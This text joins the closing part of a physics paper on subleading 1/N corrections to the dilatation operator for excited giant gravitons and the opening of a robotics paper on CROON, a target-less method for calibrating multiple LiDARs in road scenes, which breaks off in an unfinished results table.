\caption{The first plot is the spectrum of leading action of $D_{31}$, while the second plot is that of $D_{21}$. Each spectrum is calculated in the system with $n_T$=399004 and $N=200000$.}
\label{fig:leading-d31-d21-nt399004-n200000-v1}
\end{figure}
Now consider the spectrum of the leading contribution to $D_{32}$. Again the spectrum is very similar to that of the oscillator, i.e. the spectrum has several evenly spaced energy levels. The fact that there are only two levels is also not surprising and it reflects the fact that each operator is constructed using only 2 $\phi_2$ fields and 2 $\phi_3$ fields. See Figure \ref{fig:leading-spectrum01} for some examples of typical spectra. This sets the contribution to the energy levels of the system.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"leading_spectrum_01.pdf"}
\caption{The parameters $n_T$ and $N$ of the system are shown above each spectrum. It is easy to verify that the intervals between adjacent energy levels are constant in each spectrum.}
\label{fig:leading-spectrum01}
\end{figure}
\begin{table}[h]
\centering
\begin{tabular}{|l|l|l|l|}
\hline
$(N,n_T)$& $D_0$ & $D_1$ & $D_2$ \\ \hline
(200000,399004)& 5476 & 1495 & 994 \\ \hline
(199700,399204)& 4046 & 1105 & 734 \\ \hline
(300222,599444)& 5498 & 1501 & 998 \\ \hline
(379518,758546)& 2696 & 736 & 488 \\ \hline
\end{tabular}
\caption{The table presents the degeneracies of energy levels of each spectrum shown in Figure \ref{fig:leading-spectrum01}. We show pairs of parameters $N$ and $n_T$ used to compute each spectrum in the first column, while degeneracies of corresponding energy levels are shown in the latter three columns. Notation $D_0, D_1, D_2$ respectively denote the degeneracy of energy level $0, E_{0}, 2E_{0}$.}
\label{table: degeneracies}
\end{table}
The complete spectrum takes the form $0,E^{(0)},2E^{(0)}$ with the size of $E^{(0)}$ set by the formula ($\xi_{1,\text{max}}=2N-n_T$)
\begin{equation}\label{E0 of N and nT}
E^{(0)}=2\left( \frac{N}{n_T-N}-1 \right) =2\frac{\xi_{1,\text{max}}}{N-\xi_{1,\text{max}}}
\end{equation}
Notice that $E^{(0)}$ is an order 1 number as we take $N\to\infty$. Some numerical results of $E^{(0)}$ are shown in Table \ref{table: E0}. A simple check shows that formula \eqref{E0 of N and nT} is in a perfect agreement with these numerical results, within an accuracy of $1\times10^{-4}$. To facilitate the study on the spectrum of the system, in Table \ref{table: degeneracies} we also present the degeneracies of energy levels shown in Figure \ref{fig:leading-spectrum01}. All degeneracies listed in the table are exact to the precision we use, except for the second level $2E^{(0)}=0.0200$ of the spectrum computed with parameters $N=200000,n_T=399004$. We find there are 796 states of energy 0.0200 and 198 states of energy 0.0021. But, as such deviation is rather small, we still assume the second level of this spectrum is 0.0200. In fact, the average energy of these 796+198 states is 0.0200, as we expect.
Now consider the contribution to the spectrum coming from subleading corrections. An example is given in Fig \ref{fig:subleading-exact-spectrum-nt399004-n200000011}. Comparing it with the leading spectrum shown in \ref{fig:leading-spectrum01}, we see that these subleading corrections give a very small correction to the leading energy level. Simply based on this numerical evidence, we confirm that our expansion converges very rapidly. Again, in Table \ref{table: subleading degeneracies} we show degeneracies of dominating energy levels in Figure \ref{fig:subleading-exact-spectrum-nt399004-n200000011}. There are also a relatively small number of states of energy 0.0201 in each spectrum. But the average energy is still 0.0200 when those states of energy 0.0200 are included.
\begin{table}[h]
\centering
\begin{tabular}{|l|l|l|l|l|l|l|}
\cline{1-3} \cline{5-7}
$N$ & $n_T$ & $E^{(0)}$ & & $N$ & $n_T$ & $E^{(0)}$ \\ \cline{1-3} \cline{5-7}
200100 & 399004 & 0.0120 & & 300100 & 599004 & 0.0080 \\ \cline{1-3} \cline{5-7}
200000 & 399004 & 0.0100 & & 299850 & 599004 & 0.0047 \\ \cline{1-3} \cline{5-7}
199976 & 399004 & 0.0095 & & 299600 & 599004 & 0.0013 \\ \cline{1-3} \cline{5-7}
199850 & 399004 & 0.0070 & & 400100 & 799004 & 0.0060 \\ \cline{1-3} \cline{5-7}
199720 & 399004 & 0.0044 & & 399850 & 799004 & 0.0035 \\ \cline{1-3} \cline{5-7}
\multicolumn{1}{|c|}{199600} & 399004 & 0.0020 & & 399600 & 799004 & 0.0010 \\ \cline{1-3} \cline{5-7}
200000 & 398804 & 0.0120 & & 199970 & 399204 & 0.0074 \\ \cline{1-3} \cline{5-7}
200000 & 399052 & 0.0095 & & 200100 & 399350 & 0.0085 \\ \cline{1-3} \cline{5-7}
200000 & 399304 & 0.0070 & & 300222 & 599444 & 0.0067 \\ \cline{1-3} \cline{5-7}
200000 & 399564 & 0.0044 & & 300288 & 599444 & 0.0076 \\ \cline{1-3} \cline{5-7}
200000 & 399804 & 0.0020 & & 379518 & 758546 & 0.0026 \\ \cline{1-3} \cline{5-7}
\end{tabular}
\caption{The table shows the our numerical results of $E^{(0)}$ solved with different parameters $N$ and $n_T$. }
\label{table: E0}
\end{table}
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"subleading_exact_spectrum_n_T=399004_N=200000_01_v1.pdf"}
\caption{The spectra are calculated in the system with $n_T=399004$ and $N=200000$. The first plot is the spectrum of action with subleading corrections, while the second one is that of exact action. New energies caused by subleading corrections are 0.0134 and 0.0192, as 0.0156 and 0.0163 can also be found in the spectrum of leading action shown in Fig \ref{fig:leading-spectrum01}, including acceptable errors.}
\label{fig:subleading-exact-spectrum-nt399004-n200000011}
\end{figure}
\begin{table}[h]
\centering
Subleading
\begin{tabular}{cccc}
\hline
\multicolumn{1}{|c|}{energy level} & \multicolumn{1}{c|}{0.0000} & \multicolumn{1}{c|}{0.0100} & \multicolumn{1}{c|}{0.0200} \\ \hline
\multicolumn{1}{|c|}{degeneracy} & \multicolumn{1}{c|}{5472} & \multicolumn{1}{c|}{1283} & \multicolumn{1}{c|}{986} \\ \hline
\end{tabular}
{\vskip 0.2cm}
Exact
{\vskip 0.1cm}
\begin{tabular}{cccc}
\hline
\multicolumn{1}{|c|}{energy level} & \multicolumn{1}{c|}{0.0000} & \multicolumn{1}{c|}{0.0100} & \multicolumn{1}{c|}{0.0200} \\ \hline
\multicolumn{1}{|c|}{degeneracy} & \multicolumn{1}{c|}{5475} & \multicolumn{1}{c|}{1289} & \multicolumn{1}{c|}{983} \\ \hline
\end{tabular}
\caption{The tables present the degeneracies of dominating energy levels in spectra shown in Figure \ref{fig:subleading-exact-spectrum-nt399004-n200000011}, which are calculated with parameters $n_T=399004$ and $N=200000$. Data for the subleading order action is shown in the table upper, while that for the exact action is shown in the table below.}
\label{table: subleading degeneracies}
\end{table}
\section{Discussion}\label{discuss}
In this article we have evaluated subleading, in $1/N$, corrections to the dilation operator. This was done by performing and exact analytic evaluation of the one loop mixing between three complex scalar fields, $\phi_1$, $\phi_2$ and $\phi_3$. The operators which mix are constructed using a very large number of $\phi_1$ fields and much fewer $\phi_2$ and $\phi_3$ fields. These operators correspond to excited giant graviton branes, with the $\phi_2,\phi_3$ describing the open string excitations of the branes. The low energy world volume dynamics of the branes is an emergent super Yang-Mills theory. Our computation has allowed us to evaluate ineractions appearing in this emergent gauge theory.
Our exact evaluation gives a detailed formula for the matrix elements of the dilatation operator. This formula has passed a number of nontrivial tests, giving us confidence in the result. First, the terms mixing $\phi_1$ and $\phi_2$ and the terms mixing $\phi_1$ and $\phi_3$ are in complete agreement with the results obtained in \cite{2010Emergentthree,2011Surprisingly}. Secondly, the transformation of the dilatation operator to Gauss graph basis gives formulas in our example that are in complete agreement with the general formulas obtained in \cite{2012Adoublecosetansatz}. Finally, the leading terms mixing $\phi_2$ and $\phi_3$ are in complete agreement with the formulas derived in \cite{2020EmergentYangMills}. By expanding our exact result to the next subleading order, we have obtained the result (\ref{subint}) which is the main result of this paper.
The formula (\ref{subint}) represent interactions in the emergent Yang-Mills theory. The leading contribution to operator mixing comes from the mixing between $\phi_1$ and $\phi_2$ fields, and the mixing between $\phi_1$ and $\phi_3$ fields. This mixing is diagonalized by the Gauss graph operators. The next correction to operator mixing comes from the mixing between $\phi_2$ and $\phi_3$ fields. In the Gauss graph basis this mixing allows Gauss graphs to mix if they differ in the placement a single closed edge on the graph. The corresponding operators have equal dimensions, so that although this mixes operators with degenerate scaling dimensions, there is no correction to the spectrum of anomalous dimensions. The formula (\ref{subint}) gives a mixing between operators that have different dimension, and consequently it will have a non-trivial effect on the spectrum of operator dimensions.
There are a number of ways in which the study of this article can be extended. In the planar limit, arguments exploiting global symmetries were very helpful in constraining the form of the dilatation operator \cite{2004TheDynamicSpin,2008TheSu(2|2)Dynamic}. Similar computations relevant to our study include \cite{2012FromLargeN,2015RelationBetweenLargeDimension,2014HigherLoopNonplanar,2021OscillatingMultipleGiants,2011NonplanarIntegrability}.
The studies \cite{2012FromLargeN,2015RelationBetweenLargeDimension} focused on the leading order contribution, while \cite{2014HigherLoopNonplanar,2021OscillatingMultipleGiants,2011NonplanarIntegrability} were focused on the su(2) sector. It would be interesting to see if the result (\ref{subint}) can be recovered by making use of the su(3) symmetry that is present at one loop, and by making use of su(2|2) symmetry at higher loops. For this task, the action of the su(3) generators acting on restricted Schur polynomials \cite{2017RotatingRestrictedSchur} will be a useful result.
Finally, one question of clear physical significance, is to understand the emergent gauge symmetry. An initial step in this direction was taken in \cite{2020CentralCharges} by showing that the central extension of su(2$\vert$2) generates gauge transformations. This article has given an exact evaluation of the dilatation operator. It would be interesting to explore the arguments of \cite{2020CentralCharges} away from the distant corners approximation, where we expect U(1)$\times$U(1) to be enhanced to U(2). Does the central extension correctly generate gauge transformations in this setting?
\vfill\eject
| 2024-02-18T23:40:18.747Z | 2022-05-05T02:08:02.000Z | algebraic_stack_train_0000 | 2,024 | 14,077 |
|
proofpile-arXiv_065-9897 |
\section{INTRODUCTION}
With the development of computing power, high precision sensors, and further research in visual perception, automatic driving naturally becomes the foucs\cite{RN11,RN15,RN23}. 3D Light Detection and Ranging (LiDAR) has been the primary sensor due to its superior characteristics in three-dimensional range detection and point cloud density. In order to better perceive the surrounding environment, the scheme for a car with multi-LiDARs is necessary. Empirically, 5 LiDARs configured as shown in Fig. \ref{LiDARs configuration}(a) can cover the near and far filed. In order to get a wider field of view and denser point cloud representation, it is worthwhile to accurately calculate the extrinsic parameters, i.e., the rotations and translations of the LiDARs, to transform the perceptions from multiple sensors into a unique one.
\begin{figure}[ht]
\centering
\includegraphics[scale=0.15]{figures/pic1.png}
\caption{(a)LiDARs configuration in the simulated engine, (b)the field of view of the top, front, back, left, right LiDAR, our unreal world data set is collected under this configuration, (c)the field of view of the top, left, right LiDAR, our real world data set is collected under this configuration, (d) a sample of aligned unreal world data.}
\label{LiDARs configuration}
\end{figure}
\begin{comment}
Like the eye of a human, the LiDAR of a vehicle provides surrounding environment information that can be used to process, including segmentation, detection, prediction, and planning. Therefore, a consistently extremely accurate vision system is vital for a vehicle; meanwhile, it should be able to find out and rectify the error timely instead of the regular manufacturer test. In the past several years, only a few methods were proposed to research sensor extrinsic parameters calibration, and some works only test in the laboratory environment or simulation data.
\end{comment}
The extrinsic parameters were calibrated manually at the very beginning. Now there are many sensor extrinsic calibration methods, and they can be divided into target-based ones and motion-based ones. Target-based methods need auxiliary things which have distinguished geometric feature. They solve the problem with the assistance of specific targets like retro-reflective landmarks\cite{RN14,RN19}, boxes\cite{RN17}, and a pair of special planes\cite{RN21}. On the contrary, Motion-based strategies estimate relative posed of sensors by aligning an estimated trajectory and they deeply rely on vision and speed sensors, e.g., cameras and inertial measurement unit (IMU), to enrich the constraints\cite{RN9,RN22}. Another type of target-less methods could alleviate the dependence on assistant items, but still require special application scenarios\cite{RN18,RN11}. They all facilitate the solution of the problem, but there are still several limitations among these methods. Target-based methods require to measure unique markers\cite{RN14,RN19,RN17,RN21}, and the measurement will inevitably introduce errors. Because of those initial preparations in advance, target-based methods can not be applied in large-scale cases. Motion-based methods are often used as rough calibration, and they can not get precise estimations due to equipment performance and trajectory\cite{RN11}. Although some target-less methods have been proposed, they need more strict initialization or environment so that can not be used efficiently. They still can not meet the requirements of robustness, accuracy, automation, and independence simultaneously.
To address these issues, we propose a novel automatic multi-LiDAR Calibration and Refinement methOd in rOad sceNe, CROON, a two-stage calibration method consisting of a rough calibration component followed by a refinement calibration component. The LiDAR from an arbitrary initial pose can be calibrated into a relatively correct status in the rough calibration. We develop an octree-based method to continue optimizing multiple LiDARs poses in the refinement calibration.
This two-stage framework is target-less since CROON could utilize the natural characteristic of road scenes so that it has a low independence on other assistant stuff and thus is much more applicable in various situations than those target-based and motion-based ones.
Further, even though with less targets, this two-stage framework and the associated carefully-designed optimization strategy could still guarantee the stronger robustness and higher accuracy than that of those target-less methods.
In short, in the premise of a low independence on the auxiliary targets, the proposed CROON holds no loss in the robustness and accuracy in the task of extrinsic parameters calibration, which has been verified by the extensive empirical results.
\begin{comment}
The two-stage framework and optimization guarantee the robustness and accuracy of CROON. Then, CROON is a target-less method used in ordinary road scenes without any measurement, preparation, and other auxiliary sensors. So it can be easily and automatically applied in familiar scenes. Through comprehensive experimental results, CROON shows promising performance in accuracy, automation, and independence.
\end{comment}
\begin{comment}
Autonomous driving has drawn more and more attention in industry and academia.
In order to make sure that the car can behave safely and normally in diverse urban environment, autonomous driving vehicles rely heavily on sensor-based environmental perception.
Enhancing the accuracy and generalization ability of the system requires multi-sensor collaboration (camera, radar, Lidar, GPS, IMU, etc.). Multiple sensors have to be calibrated accurately with respect to a common reference frame before implementing other perceptual tasks.
To our best knowledge, existing calibration methods mainly focus on the extrinsic parameters between two or more sensing modalities, like Lidar to camera\cite{levinson2013automatic,wang2020soic,pandey2015automatic}, Lidar to radar\cite{heng2020automatic,maddern2012lost,persic2017extrinsic} or multiple sensors\cite{domhof2019}.
However, there is not too much research in the field of the calibration between radars and vehicle reference frame.
In a variety of sensors, radar plays an important role in distance and speed measuring, radar point cloud is quite sparse, but it contains the information of radial velocity, azimuth and range, which are very useful in moving object detection and tracking.
Furthermore, compared with Lidar and camera, radar is not limited by weather conditions and is able to see through rain, fog and dust due to its strong penetration abilities, which enable autonomous vehicles to deal with some extreme weather conditions.
Generally, the detection accuracy of radar depends on intrinsic and extrinsic (mainly rotational) parameters. The precision and stability of external parameter calibration directly determine the performance of subsequent environment perception procedures and thereby affecting the driving behavior of the whole autonomous driving system.
In this paper, we propose an fully automatic calibration and refinement method for multiple radar sensors and which can be conducted under commonly seen road scenes without knowing initial extrinsic parameters. This method makes use of stationary targets within the radar's field of view while the vehicle is moving to form the initial calibration and thereafter optimization process, which could serve to large-scale autonomous vehicles as an offline calibration method.
\end{comment}
The contributions of this work are as follows:
\begin{enumerate}
\item The proposed method is the first-known automatic and target-less calibration method of multiple LiDARs in road scenes.
\item We introduce a rough calibration approach to constrain the LiDARs from large deviations and an octree-based refinement method to optimize the LiDARs pose after classic iterative closest point (ICP).
\item The proposed method shows promising performance on our simulated and real-world data sets; meanwhile, the related data sets and codes have been open-sourced to benefit the community.
\end{enumerate}
\section{RELATED WORK}
\begin{comment}
Sensor calibration can be separated into two distinct categories: extrinsic and intrinsic calibration. Intrinsic calibration is usually accomplished before doing extrinsic calibration, which estimates the operational parameters of sensors. For example, Bogdan et al. \cite{bogdan2018deepcalib} extimate the focal length and distortion parameter of camera by CNN. Mirzaei et al. \cite{mirzaei2012} compute Lidar intrinsic parameters using least-squares method. By contrast, extrinsic calibration aims to determine the rigid transformations (i.e. 3D rotation and translation) of the sensor coordinate frame to other sensors or reference frames. because the rigid transformation is not feasible to measure directly due to the low error tolerance for AVs.
Existing automatic extrinsic calibration method can be mainly divided into two categories: target-based and target-less method. Target-based method usually requires special made calibration targets to make sure all features can be extracted accurately.
For extrinsic Lidar-camera calibration, Geiger et al. \cite{geiger2012automatic} perform corner points detection by convoluting corner prototypes with picture to obtain a corner likelihood image, then the positions with large convolution response are considered as the candidate positions of checkerboard corner points, then non maximum suppression is used for filtering. Finally, gradient statistics is used to verify these candidate points in an $n \times n$ local neighborhood. Zhou et al. \cite{zhou2018automatic} introduce the 3D line correspondence into the original plane correspondence, which reduces the required calibration target poses to one. In addition, the similarity transformation technique
eliminates the error caused by checkerboard size.
As for extrinsic calibration of Lidar and radar sensors, Peršić et al. \cite{persic2017extrinsic} design a triangular trihedral corner reflector. The 3D position of the calibration target is located by finding the laser scan plane correspond to triangle board in Lidar frame and average high radar-cross-section (RCS) values in radar frame respectively. The extrinsic calibration is found by optimizing reprojection error followed by further refinement using additional RCS information.
However, making calibration targets and setting up the calibration environment normally consumes a lot of time and labor, and the targets must be presented all the time during the calibration procedure. Target-less methods address these drawbacks by taking advantage of the features in nature environment. Pandey et al. \cite{pandey2012automatic} extract the reflectivity of the 3D points obtained from Lidar and the pixel intensity of camera image as mutual information (MI) and find the optimal calibration by maximizing MI. Ma et al. \cite{ma2021crlf} solve the same calibration by using the line features in the road scene to formulate the initial rough calibration and refine it by searching on 6-DoF extrinsic parameters. Schöller et al. \cite{scholler2019} propose a radar to camera calibration approach by applying CNN to extract features from images and projected radar detection, the output layer has four neurons which corresponds to quaternion indicating the rotation between radar and camera frame. It is noteworthy that there are few automatic target-less methods to solve the extrinsic calibration of radar sensors.
Heng et al. \cite{lionel2020} propose a automatic target-less extrinsic calibration method for multiple 3D Lidars and radars
by dividing the task into three subtasks: multi-Lidar calibration, 3D map construction and radar calibration. They optimize the calibration result for Lidars and radars by minimizing the point-to-plane distances between different Lidar scans and radar scans to 3D map respectively. In addition, the radial velocity measured by radars is also taken into account to further refine the extrinsic parameters.
For calibration between radar sensors and vehicle reference frame, Izquierdo et al. \cite{Izquierdo2018} propose a automatic and unsupervised method by recording high sensitive static elements like lights or traffic signs in a high-defination (HD) map, then obtain the extrinsic calibration by registering radar scans to the corresponding targets. However, this method requires a very precise localization (less than 2 cm) in the HD map. Compared with the above two methods, neither building local map nor pre-prepared HD map is required by our calibration method.
\end{comment}
Extrinsic calibration aims to determine the rigid transformations (i.e., 3D rotation and translation) of the sensor coordinate frame to the other sensors or reference frames \cite{RN41}, The methods of extrinsic calibration for sensor systems with LiDARs can be divided into two categories: (1) motion-based methods that estimate relative poses of sensors by aligning an estimated trajectory from independent sensors or fused sensor information, and (2) target-based/appearance-based methods that need specific targets which have distinguished geometric feature such as a checkerboard.
The motion-based approaches are known as hand-eye calibration in simultaneous localization and mapping (SLAM). The hand-eye calibration was firstly proposed to solve mapping sensor-centered measurements into the robot workspace frame, which allows the robot to precisely move the sensor\cite{RN39,RN40,RN42}. The classic formulation of the hand-eye calibration is $AX = XB $, where $A$ and $B$ represent the motions of two sensors, respectively, and $X$ refers to the relationship between the two sensors. Heng et al.\cite{RN36} proposed a versatile method to estimate the intrinsic and extrinsic of multi-cameras with the aid of chessboard and odometry. Taylor et al.\cite{RN22, RN9}introduced a multi-modal sensors system calibration method that requires less initial information. Qin et al.\cite{RN35} proposed a motion-based methods to estimate the online temporal offset between the camera and IMU. They also proposed to estimate the calibration of camera-IMU transformation by visual-inertial navigation systems in an online manner\cite{RN34}. The research work in \cite{RN10} aligned the camera and lidar by using the sensor fusion odometry method. In addition, Jiao et al.\cite{RN11} proposed a fusion method that included motion-based rough calibration and target-based refinement. It is worth noting that motion-based methods heavily depend on the results of the vision sensors and can not deal with the motion drift well.
Target-based approaches recover the spatial offset for each sensor and stitch all the data together. Therefore, the object must be observable to sensors, and correspondence points should exist. Gao et al.\cite{RN14} estimated extrinsic parameters of dual LiDARs using assistant retro-reflective landmark on poles which could provide distinguished reflect signal. Xie et al.\cite{RN13} demonstrated a solution to calibrate multi-model sensors by using Apriltags in the automatic and standard procedure for industrial production. Similarly, Liao et al.\cite{RN28} proposed a toolkit by replacing Apriltags with the polygon. Kim et al.\cite{RN15} proposed an algorithm using the reflective conic target and calculating the relative pose by using ICP. Those methods\cite{RN13,RN15} complete final calibration by using the parameters of special targets known in advance, so it is essential to estimate the exact measurement. Zhou et al.\cite{RN25} demonstrated a method to facilitate the calibration by establishing line and plane relationship in chessboard. Z. Pusztai\cite{RN17} introduced a method that mainly required the perpendicular characteristic of boxes for accurate calibration in the camera-LiDAR system. Choi et al.\cite{RN21} designed an experiment to estimate the extrinsic parameters of two single-line laser-line sensors by using a pair of orthogonal planes. Similarly, three linearly independent planar surfaces were used in automatic LiDAR calibration work in\cite{RN18}.
The real automatic and target-less calibration methods attract more and more attention. He et al.\cite{RN29,RN30} extracted point, line, and plane features from 2D LIDARs in nature scenes and calibrated each sensor to the frame on a moving platform by matching the multi-type features. Automatic extrinsic calibration of 2D and 3D LIDARs method was put forward in \cite{RN32}. Pandey et al.\cite{RN33} demonstrated the mutual information based algorithm could benefit the calibration of a 3D laser scanner and an optical camera.
\section{METHODOLOGY}
In our experiment, we have five LiDARs. They can be divided into two classes of the master and slaves. The top LiDAR is the master LiDAR $PC_{m}$ and the rest (front, back, left, right) are slave LiDARs $PC_{s}(PC_{f}, PC_{b}, PC_{l}, PC_{r})$. Our goal is calibrating LiDARs by estimating the extrinsic parameters including rotation $\bm{R}$ and translation $\bm{T}$ and finally fusing all LiDARs data into a single one as demonstrated in Fig.\ref{LiDARs configuration}(d). $\bm{R}$ and $\bm{T}$ can be subdivided into $angle_{pitch},angle_{roll},angle_{yaw}$ and $x,y,x$, that represent the rotation angle and translation in three dimensions, respectively. The problem can be defined as follow:
\begin{equation}\label{origin cost function}
\begin{aligned}
\bm{R}^*,\bm{T}^*\ =\ \arg\underset{\bm{R} ,\bm{T}}{\min}\sum\limits _{n=1}^{N} \lvert\lvert PC_{s} -PC_{m} \rvert\rvert_2
\end{aligned}
\end{equation}
\noindent where $\lvert\lvert\cdot\rvert\rvert_2 $ indicates the $l_{2}$-norm of a vector.
\begin{figure*}[t]
\centering
\includegraphics[scale=0.2]{figures/mid_process_v3.png}
\caption{The different periods of our method in real/unreal world data set. The first two rows represent the top-view and left-view of unreal world data. The last two rows represent the top-view and left-view of real world data. (a) column shows the initial pose, (b) column is collected when the ground planes of point clouds are calibrated, (c) column represents the results after rough calibration, and (d) column represents the renderings of refinement calibration.}
\label{aligned data}
\end{figure*}
It is not tractable to optimize a $ 6-DOF $ problem from the beginning because the range of the parameters is too large. So in the first section, the solution which could narrow the range quickly and robustly will be proposed.
\subsection{rough calibration}
The method we proposed is applied to road scene which widely exist. On the road, the LiDAR can easily sample a large amount of ground plane information, therefore, ground plane always can be registrate correctly. It means that $angle_{pitch}, angle_{roll}, and z$ are solved. So the first step of our algorithm is rough registration by taking advantage of the characteristic.
Suppose the maximal plane which contains the most points is considered as the ground plane $GP:\{a,b,c,d\}$:
\begin{equation}\label{GP extration}
\begin{aligned}
GP:\{a,b,c,d\} = \arg\underset{\lvert plane \rvert}{\max} \lvert {ax_i + by_i + cz_i + d \rvert \leq \epsilon}
\end{aligned}
\end{equation}
where $(x_i,y_i,z_i) \in plane$ and $plane \subset PC$ and $\epsilon$ means the threshold of the plane thickness.
The ground plane is used to align the slave LiDAR ground planes $GP_{s}(GP_{f}, GP_{b}, GP_{l}, GP_{r})$ to the master LiDAR ground plane $GP_{m}$:
\begin{equation}\label{GP registration axis}
\begin{aligned}
\vec{n} = \overrightarrow{GP_m} \times \overrightarrow{GP_s}
\end{aligned}
\end{equation}
\begin{equation}\label{GP registration angle}
\begin{aligned}
\theta = \overrightarrow{GP_m} \cdot \overrightarrow{GP_s}
\end{aligned}
\end{equation}
where $\vec{n}$, $\theta$, $\overrightarrow{GP_m}$, $\overrightarrow{GP_s}$ represent the rotation axis, rotation angle, master LiDAR normal vector and slave LiDAR normal vector, respectively. The transformation matrix can be computed by Rodriguez formula.
\begin{comment}
In order to extract the more flatness ground plane, we use a multi-scale search algorithm which has several different sampling coefficients. A relative right pose could be got after that processing and then we would divide the ground plane point could into smaller point clouds. In each subset we would calculate a more accurate ground plane equation. Finally, the ground plane equation would be very accurate by summing the results of all subsets.
\end{comment}
It is worth noting that an extreme case can appear where the difference between the estimated pitch/roll and the actual pitch/roll is $\pm \pi$. So the method need to check whether most of the points of $PC_{s}$ are on the ground plane after the calibration. According to the point cloud without ground points, the direction of the ground plane normal vector can be confirmed quickly, and all $GP$ normal vectors should have the same direction, $\xrightarrow{}$ direction as $\overrightarrow{GP_m} = \overrightarrow{GP_s}$.
Through above measures, a rough estimation of $angle_{pitch}, angle_{roll}, z $ can be established. The next step is the calibration of $angle_{yaw}, x, y $. The cost function can be simplified from (\ref{origin cost function}):
\begin{equation}\label{simplified cost function}
\begin{aligned}
&angle^{*}_{yaw} ,\ x^*,\ y^*\ =
\\ \ &\arg\underset{yaw,x,y}{\min}\sum \sqrt{( x_{s} -x_{m})^{2} +( y_{s} -y_{m})^{2}}
\end{aligned}
\end{equation}
The number of arguments decreases from 6 to 3. More importantly, the ground points could be ignored. There are three obvious advantages of the method described above: a) the computational complexity is reduced significantly because the proportion of ground points is very high; b) the points with more explicit characteristics are extracted because the relatively ordinary ground points have been discarded; c) points that should have a more significant impact on the cost function are sampled because the error of distant points can better reflect the effect in practice.
In real application, we approximately solve Eq.\ref{simplified cost function} by firstly finding the optimal $angle_{yaw}$ and then the optimal ones of $x$ and $y$. This is because the pose error caused by rotation effects more on the loss function than that cause by the translation. We choose to scan the range of $angle_{yaw}$ by using binary search.
\begin{comment}
Not all points are useful, and the same is true for $angle_{yaw}, x, y $. For example, when the error of $angle_{yaw}$ is $ 1\degree$, the error at a point ten meters away is $0.17m$. It means that the offset of $x$ or $y$ must be $17cm$ to achieve the same effect, so the pose error caused by rotation is much greater than that caused by translation, and we focus more on $angle_{yaw}$ than $x,y$. According to the explanation above, the problem of $angle_{yaw}, x, y $ can be approximated as finding the optimal $angle_{yaw}$ firstly. We choose to scan the range of $angle_{yaw}$ by using binary search.
\end{comment}
\subsection{refinement calibration}
After the rough registration described in the last subsection, we can further refine the relative right pose for each LiDAR. In this section, we will continue improving the calibration accuracy by iterative closest points with normal (ICPN) and octree-based optimization.
We first use a variant of ICP. The origin ICP is to find the optimal transform between two point clouds that minimizes the loss function $ \sum\limits _{n=1}^{N} \lvert\lvert PC_{s} -PC_{m} \rvert\rvert $. The method requires strict initialization, and it is easy to trap in the locally optimal value. We thus adopt the ICPN which is a variant of ICP and can achieve better performance. We suppose that due to the sparsity of the point cloud, the point cloud feature is not explicit and hard to extract. The ICPN enriches the point feature by containing the normal of each point. A point normal includes position information of the point, and more importantly, it could provide the neighbor points information. These together make the ICPN expands the receptive field of every point and better utilizes the local information for calibration. In our implementation, the normal of each point is calculated from the nearest 40 neighboring points by PCA.
\begin{figure}[ht]
\centering
\includegraphics[scale=0.2]{figures/octree-based_method.jpg}
\caption{Octree-based method. Mark the cube with points in blue and mark the cube without a point in green, cutting the cube iteratively and the volume of blue/green cubes can be measured the quality of calibration.}
\label{octree}
\end{figure}
\begin{figure*}[ht]
\centering
\includegraphics[scale=0.2]{figures/real_world_boxplot.png}
\caption{Experiment results of ten real road scenes. In each scene, we collect 250 sets of data. We repeat the calibration 250 times and calculate the mean and standard deviation of the 6-DOF results.}
\label{plotbox of real scene}
\end{figure*}
Furthermore, we continue minimizing the pose error with the octree-based optimization as illustrated in Fig.\ref{octree}. At the beginning, there are two point clouds $PC$ wrapped in a cube $_{o}C$. We then utilize the octree-based method to equally cut the cube into eight smaller cubes.
\begin{equation}\label{cut the cube}
\begin{aligned}
_{p}C \stackrel{cut }{\Longrightarrow} \{_{c}C_1, _{c}C_2,\cdots, _{c}C_7, _{c}C_8\}
\end{aligned}
\end{equation}
where $_{p}C$ represents the parent cube and $_{c}C_{i}$ represent the child cube of $_{p}C$. The cutting procedure is iteratively repeated to get more and smaller cubes. We mark the cubes with points as blue ones and the cubes without a point as the green ones, as shown in Fig.\ref{octree}. They are further denoted as $C^b$ and $C^g$. The volume of $_{o}C$ can be expressed as follow:
\begin{equation}\label{calculate the space}
\begin{aligned}
V_{_{o}C} = \sum\limits _{i=1}^{N} V_{C^b_i} + \sum\limits _{j=1}^{M} V_{C^g_j}
\end{aligned}
\end{equation}
where $N$ and $M$ refer to the number of $C^b$ and $C^g$. When the side length of the small cube is short enough, We can approximate that the space volume occupied by the point cloud is the volume of the blue cubes. When two point clouds are aligned accurately, the space volume occupied by point clouds reaches the minimum, and the volume of blue cubes reaches the minimum at the same time. So the problem can be converted to:
\begin{comment}
When we choose an appropriate value of side length, It is comprehensible that the number of blue/green cubes represents the quality of the point cloud registration. Take the puzzle as an example. An unassigned puzzle occupies more area than an assigned puzzle because there exists so much white space in an unassigned puzzle, and the assigned puzzle occupies the smallest space. An analogy to three-dimensional space, when two point clouds are aligned correctly, the number of blue cubes is the least, and the number of green cubes is the most:
\end{comment}
\begin{equation}\label{octee-based optimal}
\begin{aligned}
\bm{R}^*,\bm{T}^*\ =\ \arg\underset{\bm{R} ,\bm{T}}{\min} \sum\limits _{j=1}^{M} V_{C^b_j}
\end{aligned}
\end{equation}
Considering that the current pose is close to the correct, we continue optimizing the formula above by scanning the domain of arguments.
\section{EXPERIMENTS}
In this section, we will apply our method in two different style data sets. The real data set is collected from our driverless vehicle platform. The driveless vehicle platform configures three LiDARs in the top, left, and right of the vehicle. The three LiDARs are high-precision and have a large view field, 10 refresh rate, and well-calibrated intrinsics. Another data set is collected from Carla simulated engin\cite{Dosovitskiy17}. The driverless vehicle in the unreal engine has more LiDARs in the front and back. To analyze the accuracy, robustness, and efficiency of the proposed calibration method, we test on a number of different road conditions. Experiment results show that our method achieves better performance than those state-of-the-art approaches in terms of accuracy and robustness.
\begin{table*}[b]
\centering
\setlength{\tabcolsep}{5mm}
\renewcommand{\arraystretch}{1.2}
\caption{Quantitative results on simulated data set.}
\begin{tabular}{cccccccc}
\hline
\multicolumn{2}{c}{\multirow{2}{*}{\textbf{LiDAR position}}} & \multicolumn{3}{c}{\textbf{Rotation Error{[}deg{]}}} & \multicolumn{3}{c}{\textbf{Translation Error{[}m{]}}} \\ \cline{3-8}
